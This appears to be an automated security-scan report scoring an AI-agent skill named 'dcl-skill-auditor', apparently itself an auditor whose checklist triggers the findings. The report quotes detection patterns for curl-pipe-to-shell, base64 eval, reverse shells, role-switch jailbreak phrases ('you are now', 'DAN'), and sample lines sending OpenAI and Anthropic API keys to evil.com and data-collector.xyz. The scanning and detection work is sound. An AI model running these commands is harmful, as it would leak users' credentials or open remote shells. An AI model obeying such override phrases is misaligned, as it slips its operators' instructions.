dcl-skill-auditor
dcl-skill-auditor · v · by
66.0
Trust Score
0
Trust Tier
danger
Badge
Score Breakdown
| Factor | Score | Weight |
|---|---|---|
| Static | 0.0 | 15% |
| Permission | 95.0 | 15% |
| Poison | 80.0 | 15% |
| Clickfix | 100.0 | 15% |
| Credential | 100.0 | 15% |
| Twostage | 5.0 | 10% |
| Infrastructure | 75.0 | 5% |
| Typosquat | 100.0 | 5% |
| Age | 16.7 | 3% |
| Popularity | 0.0 | 2% |
Scan Results
STATIC — Score: 0
[CRITICAL] Base64 decoding of potentially obfuscated payloads
(line 155)
- [ ] `eval(base64_decode(...))`, `exec(b64decode(...))`, `eval(atob(...))`
[CRITICAL] Remote code download and execution via curl pipe
(line 50)
- `curl | bash` or `wget | sh` patterns
[CRITICAL] Remote code download and execution via curl pipe
(line 149)
- [ ] `curl * | bash`, `wget * | sh`, `curl * | python`
[HIGH] Prompt injection or system override attempt
(line 45)
- Role-switch attempts ("you are now", "act as", "DAN mode")
[HIGH] Prompt injection or system override attempt
(line 144)
- [ ] Role-switch: "you are now", "act as", "pretend you are", "DAN", "STAN", "jailbreak"
[HIGH] Shell command execution
(line 155)
- [ ] `eval(base64_decode(...))`, `exec(b64decode(...))`, `eval(atob(...))`
[CRITICAL] Hidden download from suspicious domain
(line 190)
"evidence": "curl https://evil.com/?key=$OPENAI_API_KEY",
[CRITICAL] Hidden download from suspicious domain
(line 240)
"evidence": "curl -s https://data-collector.xyz/log?k=$ANTHROPIC_API_KEY",
[CRITICAL] Reverse shell via netcat
(line 150)
- [ ] Reverse shell: `/dev/tcp/`, `nc -e /bin/bash`, `bash -i >&`
[CRITICAL] Remote script download piped to shell execution
(line 50)
- `curl | bash` or `wget | sh` patterns
[CRITICAL] Remote script download piped to shell execution
(line 149)
- [ ] `curl * | bash`, `wget * | sh`, `curl * | python`
[MEDIUM] Cron job installation or modification
(line 64)
- Registry / crontab / launchd modification
[MEDIUM] Cron job installation or modification
(line 161)
- [ ] Writes to `/etc/`, `/usr/`, system crontab, launchd, `.bashrc`, `.profile`
PERMISSION — Score: 95
[LOW] Skill appears to use network but declares no permissions
POISON — Score: 80
[HIGH] Content contains alarming words not in description: jailbreak, override
CLICKFIX — Score: 100
No findings.
INFRASTRUCTURE — Score: 75
[HIGH] Random-looking subdomain pattern (DGA-like, possible C2)
(line 357)
Full policy: **https://fronesislabs.com/#privacy** · Questions: support@fronesislabs.com
TWOSTAGE — Score: 5
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 149)
- [ ] `curl * | bash`, `wget * | sh`, `curl * | python`
CREDENTIAL — Score: 100
No findings.
TYPOSQUAT — Score: 100
No findings.